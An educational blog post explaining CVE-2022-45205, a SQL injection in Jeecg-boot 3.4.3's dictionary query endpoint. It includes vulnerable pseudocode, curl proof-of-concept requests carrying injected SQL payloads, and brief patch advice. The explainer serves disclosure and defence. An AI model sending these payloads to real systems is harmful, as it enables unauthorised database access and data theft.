---
Jeecg-boot is a popular low-code platform for rapid business application development in Java. Unfortunately, version 3.4.3 contains a serious security flaw: CVE-2022-45205, a SQL injection vulnerability in the /sys/dict/queryTableData endpoint. This post breaks down the vulnerability in plain language, shows code snippets, and gives insights and resources for further learning—including how attackers might exploit it.
What is CVE-2022-45205?
CVE-2022-45205 is an identifier for a security flaw found in Jeecg-boot v3.4.3. The vulnerability allows remote attackers to inject malicious SQL commands by manipulating inputs sent to the /sys/dict/queryTableData API. Essentially, an attacker could steal or destroy data from your database with a crafted request.
Official Reference:
- NVD - CVE-2022-45205
Where’s the Problem? Vulnerable Endpoint Explained
The /sys/dict/queryTableData endpoint lets the frontend fetch dictionary data from a database, like for dropdown menus. The issue lies in how it processes the URL parameters—especially code and text. These are added directly to a SQL query without proper sanitization.
Example vulnerable request
POST /jeecg-boot/sys/dict/queryTableData
Content-Type: application/json
{
"table": "users",
"text": "username",
"code": "id",
"key": "",
"pid": "",
"condition": ""
}
A bad actor can change these values to inject SQL payloads.
Vulnerable Code Snippet (Simplified)
This is not the actual Jeecg-boot source, but here's a simplified Java-style pseudocode to help you see where the mistake happens:
// Pseudocode illustrating the flaw
String table = request.getParameter("table");
String text = request.getParameter("text");
String code = request.getParameter("code");
String sql = "SELECT " + code + ", " + text + " FROM " + table;
List<Map<String, Object>> results = jdbcTemplate.queryForList(sql);
Problem:
The code inserts untrusted user-supplied input directly into the SQL query string. If the attacker controls the table, text, or code fields, they can run arbitrary SQL.
How Does the Exploit Work?
An attacker sends a POST request to /sys/dict/queryTableData with malicious SQL in the table, text, or code parameters. Here’s a simple example using curl:
Suppose the attacker wants to leak user information. They set the code parameter to
id FROM users;--
Step 2: The Exploit Request
curl -X POST http://target-server/jeecg-boot/sys/dict/queryTableData \
-H "Content-Type: application/json" \
-d '{
"table": "users",
"text": "username",
"code": "id from users;-- ",
"key": "",
"pid": "",
"condition": ""
}'
The resulting SQL is
SELECT id FROM users;-- , username FROM users
Depending on how the backend executes queries, the -- marks comment in SQL, making the rest ignored. This could lead to data leakage.
Dumping entire tables
curl -X POST http://target-server/jeecg-boot/sys/dict/queryTableData \
-H "Content-Type: application/json" \
-d '{
"table": "users WHERE 1=1;-- ",
"text": "username",
"code": "id",
"key": "",
"pid": "",
"condition": ""
}'
Here, the attacker modifies the table name, potentially adding any SQL logic.
Remediation
Update Jeecg-boot!
- As of Jeecg-boot’s GitHub, this issue is patched in later versions (v3.4.4+).
Sanitize Input:
References & Learn More
- NVD - CVE-2022-45205
- Jeecg-boot Project on GitHub
- OWASP SQL Injection Cheat Sheet
Summary
CVE-2022-45205 is an easily exploitable SQL injection in Jeecg-boot 3.4.3 and possibly earlier. If you’re running this version, update immediately and audit any custom endpoints for similar issues. Always validate and sanitize your input; SQL injection is a classic problem with devastating consequences.
Stay safe and patch early!
(For educational purposes only. Never test vulnerabilities on anything you do not own or have permission to test.)
Timeline
Published on: 11/25/2022 17:15:00 UTC
Last modified on: 11/28/2022 19:42:00 UTC